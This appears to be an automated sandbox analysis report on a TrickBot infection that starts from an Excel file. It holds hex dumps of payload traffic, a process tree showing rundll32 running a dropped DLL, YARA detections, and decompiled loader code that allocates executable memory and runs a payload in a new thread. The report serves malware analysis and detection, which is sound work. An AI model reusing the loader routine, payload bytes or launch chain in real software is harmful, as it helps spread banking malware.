                            Apr 12, 2021 17:06:02.888232946 CEST6INData Raw: 8a fc ff ff 66 0f 6e c7 33 c0 f3 0f e6 c0 f2 0f 11 45 f8 89 7d fc 5f 5b 8b e5 5d c3 55 8b ec 83 ec 38 53 bb c3 68 13 00 56 57 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 c8 89 5d cc 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 c8 89 5d cc 66 0f 6e c3 f3 0f e6 c0
                            Data Ascii: fn3E}_[]U8ShVWfnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]fnE]Ef
                            Apr 12, 2021 17:06:02.888254881 CEST7INData Raw: 00 c7 45 d4 c3 68 13 00 03 ce 66 0f 6e 45 d4 0f b7 1b f3 0f e6 c0 f2 0f 11 45 d0 66 0f 6e c0 f3 0f e6 c0 89 45 d4 f2 0f 11 45 d0 89 45 d4 8b 45 f0 35 a1 54 cc bf 3b d0 75 38 8b 04 99 ba c3 68 13 00 03 c6 a3 28 90 00 10 66 0f 6e c2 f3 0f e6 c0 f2
                            Data Ascii: EhfnEEfnEEEE5T;u8h(fnEfnUEUME5T;u8h,fnEfnUEUME5T;u5h0fnEfnUEUM
                            Apr 12, 2021 17:06:02.888279915 CEST9INData Raw: 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 f8 89 5d fc 8b 5d 14 85 db 74 06 8b 44 ca 7c 89 03 80 7d 0c 00 bb c3 68 13 00 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 f8 89 5d fc 0f 84 db 00 00 00 8d 04 3e e9 65 01 00 00 b9 64 86 00 00 66 3b c1 0f 85 d5 00 00 00
                            Data Ascii: fnE]]tD|}hfnE]>edf;MfnEfn]E]9fnE];fnEfn]E]fnE]]t}
                            Apr 12, 2021 17:06:02.888300896 CEST9INData Raw: f2 0f 11 45 dc 89 7d e0 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 89 7d e0 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f
                            Data Ascii: E}fnE}fnEfn}Efn}Efn}Efn}E}dffnf#J]MffEfn}UEfn}E}EEEhfnEEE
                            Apr 12, 2021 17:06:02.888324976 CEST10INData Raw: 32 30 30 30 0d 0a ec 0f b7 c1 89 45 f0 b8 c3 68 13 00 0f b7 f9 f3 0f e6 c0 f2 0f 11 45 f8 89 45 fc 66 83 f9 03 75 1c 8b f8 8b 45 14 01 03 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 89 7d 0c e9 7d 03 00 00 33 c9 41 66 3b f9 75 48 0f b7 0b 8b f8 8b 45
                            Data Ascii: 2000EhEEfuEfnE}}3Af;uHEfnfEfn}Efn}E}-~JEfnEMUt'fnEfn}E}fnEM
                            Apr 12, 2021 17:06:02.888351917 CEST12INData Raw: f3 0f e6 c0 ff 75 10 f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 ff 75 0c f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 50 8d 42 f8 d1 e8 50 f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 f2 0f 11 45 f4 66 0f 6e c1 f3 0f e6 c0 89 4d f8 f2
                            Data Ascii: uEMfnuEMfnPBPEMfnEfnMEfnMEMMEhfnEQEEh.hfnEfnMEMt39],8GfnEMtfnEMf
                            Apr 12, 2021 17:06:02.888376951 CEST13INData Raw: 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 e8 66 0f 6e c7 f3 0f e6 c0 89 7d ec f2 0f 11 45 e8 89 7d ec eb 03 33 db 43 66 0f 6e c7 8b c3 f3 0f e6 c0 f2 0f 11 45 e8 66 0f 6e c7 f3 0f e6 c0 89 7d ec f2 0f 11 45 e8 89 7d ec 5f 5e 5b 8b e5 5d c3 55 8b ec 51
                            Data Ascii: fnEfn}E}3CfnEfn}E}_^[]UQQShVuW}fnEfn]E]$fnE]tefnE]FGfnEfn]Efn]E];tfnE]
                            Apr 12, 2021 17:06:03.019260883 CEST15INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:


                            Code Manipulations

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: EXCEL.EXE PID: 2056 Parent PID: 584

                            General

                            Start time:17:05:35
                            Start date:12/04/2021
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase:0x13f7e0000
                            File size:27641504 bytes
                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: rundll32.exe PID: 2564 Parent PID: 2056

                            General

                            Start time:17:05:40
                            Start date:12/04/2021
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:rundll32 ..\fdinmd.fii,StartW
                            Imagebase:0xff700000
                            File size:45568 bytes
                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: rundll32.exe PID: 2588 Parent PID: 2564

                            General

                            Start time:17:05:40
                            Start date:12/04/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32 ..\fdinmd.fii,StartW
                            Imagebase:0x940000
                            File size:44544 bytes
                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:high

                            Chronological Activities

                            Analysis Process: wermgr.exe PID: 2604 Parent PID: 2588

                            General

                            Start time:17:05:41
                            Start date:12/04/2021
                            Path:C:\Windows\System32\wermgr.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\wermgr.exe
                            Imagebase:
                            File size:50688 bytes
                            MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Chronological Activities

                            Disassembly

                            Code Analysis

                            Reset < >

                              Analysis Process: rundll32.exe PID: 2588 Parent PID: 2564 rundll32.exeCOMMON

                              Execution Graph

                              Execution Coverage:21.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:15
                              Total number of Limit Nodes:1

                              Graph

                              execution_graph 116 7b3780 SetTimer 117 7b3797 GetMessageW 116->117 118 7b37bd 117->118 119 7b37ab 117->119 121 7b380b VirtualAlloc 118->121 123 7b383c 118->123 119->118 120 7b37bf DispatchMessageW 119->120 120->117 121->118 122 7b382b Sleep 121->122 122->118 124 7b3852 CreateThread SetTimer 123->124 125 7b387a GetMessageW 124->125 129 7c0000 124->129 126 7b38a0 125->126 127 7b388e 125->127 127->126 128 7b38a2 DispatchMessageW 127->128 128->125 130 7c000e 129->130

                              Callgraph

                              Executed Functions

                              Function 007B3780, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowtimesleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 100%
                              			E007B3780() {
				_Unknown_base(*)()* _v8;
				void* _v12;
				struct tagMSG _v40;
				long _v44;
				struct HWND__* _v48;
				long _v52;
				void* _v56;
				void* _t38;
				void* _t43;
				int _t45;

				SetTimer(0, 0, 0x25b, 0); // executed
				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
					_v40.message = _v40.message + 1;
					if(_v40.message != 0x114) {
						DispatchMessageW( &_v40);
						continue;
					} else {
					}
					break;
				}
				_v12 = 0;
				_v48 = 0;
				_v52 = 0x5000;
				while(_v52 > 0x1000) {
					_v52 = _v52 - 1;
				}
				_v44 = _v52;
				while(_v44 > 0x40) {
					_v44 = _v44 - 1;
				}
				do {
					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
					_v8 = _t38;
					if(_v8 == 0) {
						Sleep(0x1f4);
					}
				} while (_v8 == 0);
				_v48 =  &(_v48->i);
				E007B3740(_v48, _v8);
				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
				_v56 = _t43;
				SetTimer(0, 0, 0x2000, 0); // executed
				while(1) {
					_t45 = GetMessageW( &_v40, 0, 0, 0);
					if(_t45 == 0) {
						break;
					}
					_v40.message = _v40.message + 1;
					if(_v40.message == 0x114) {
						return _t45;
					}
					DispatchMessageW( &_v40);
				}
				return _t45;
			}













                              0x007b3791
                              0x007b3797
                              0x007b37b1
                              0x007b37bb
                              0x007b37c3
                              0x00000000
                              0x00000000
                              0x007b37bd
                              0x00000000
                              0x007b37bb
                              0x007b37cb
                              0x007b37d2
                              0x007b37d9
                              0x007b37e0
                              0x007b37ef
                              0x007b37ef
                              0x007b37f7
                              0x007b37fa
                              0x007b3806
                              0x007b3806
                              0x007b380b
                              0x007b381c
                              0x007b3822
                              0x007b3829
                              0x007b3830
                              0x007b3830
                              0x007b3836
                              0x007b3842
                              0x007b384d
                              0x007b3860
                              0x007b3866
                              0x007b3874
                              0x007b387a
                              0x007b3884
                              0x007b388c
                              0x00000000
                              0x00000000
                              0x007b3894
                              0x007b389e
                              0x00000000
                              0x00000000
                              0x007b38a6
                              0x007b38a6
                              0x007b38b1

                              APIs
                              • SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 007B3791
                              • GetMessageW.USER32 ref: 007B37A1
                              • DispatchMessageW.USER32(?), ref: 007B37C3
                              • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 007B381C
                              • Sleep.KERNEL32(000001F4), ref: 007B3830
                              • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 007B3860
                              • SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 007B3874
                              • GetMessageW.USER32 ref: 007B3884
                              • DispatchMessageW.USER32(?), ref: 007B38A6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_780000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                              • String ID: @
                              • API String ID: 368155642-2766056989
                              • Opcode ID: 0ed0f3c26014fd56efe24855b3168cf125f359ad45015d5f23035be1df4c36ff
                              • Instruction ID: 63652ecb9a1a9e08397d97ea2cd21bd5fcba759259847b9ae9acec2a7f53618a
                              • Opcode Fuzzy Hash: 0ed0f3c26014fd56efe24855b3168cf125f359ad45015d5f23035be1df4c36ff
                              • Instruction Fuzzy Hash: 8541FFB0E40218EBEB14DFA4DD89FEDB775BB48705F208254F6017A1C0D779AA40DB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 007C2720, Relevance: .1, Instructions: 130COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 22 7c2720-7c2766 23 7c2768-7c2774 22->23 23->23 24 7c2776-7c2782 23->24 25 7c278e-7c27c8 24->25 26 7c2784-7c278d 24->26 32 7c27cb-7c27d4 25->32 26->25 33 7c27da-7c2808 32->33 35 7c280a-7c2813 33->35 36 7c2817-7c282d 33->36 35->36
                              Memory Dump Source
                              • Source File: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7c0000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4fbc9169981b45fd04b6c840e8e75f66a8f698123987a24c0b288b45893942f2
                              • Instruction ID: 05b00525b3143d250a4efa4c0197844d8969dbcda2d812a502e17f680c0ff937
                              • Opcode Fuzzy Hash: 4fbc9169981b45fd04b6c840e8e75f66a8f698123987a24c0b288b45893942f2
                              • Instruction Fuzzy Hash: 39412BB5604205AFEB08CF18DC45DAABBEDFB48321B10855DF909CB342DA31ED41CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 007C27CB, Relevance: .0, Instructions: 40COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 37 7c27cb-7c27d4 38 7c27da-7c2808 37->38 40 7c280a-7c2813 38->40 41 7c2817-7c282d 38->41 40->41
                              Memory Dump Source
                              • Source File: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7c0000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e33fe5da96f720e4fe6e238dac6dffeaa3174ff5709e0af4cc75d5c3c910f501
                              • Instruction ID: b6a2238db6aa4106d0dc4c35ecc958fb3914f0f4c5bae18702f2ce7d263d13f1
                              • Opcode Fuzzy Hash: e33fe5da96f720e4fe6e238dac6dffeaa3174ff5709e0af4cc75d5c3c910f501
                              • Instruction Fuzzy Hash: E801E8B5600209AFCB44DF18C84495ABBE9FF88310B15C999FC19CB302D730ED91CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions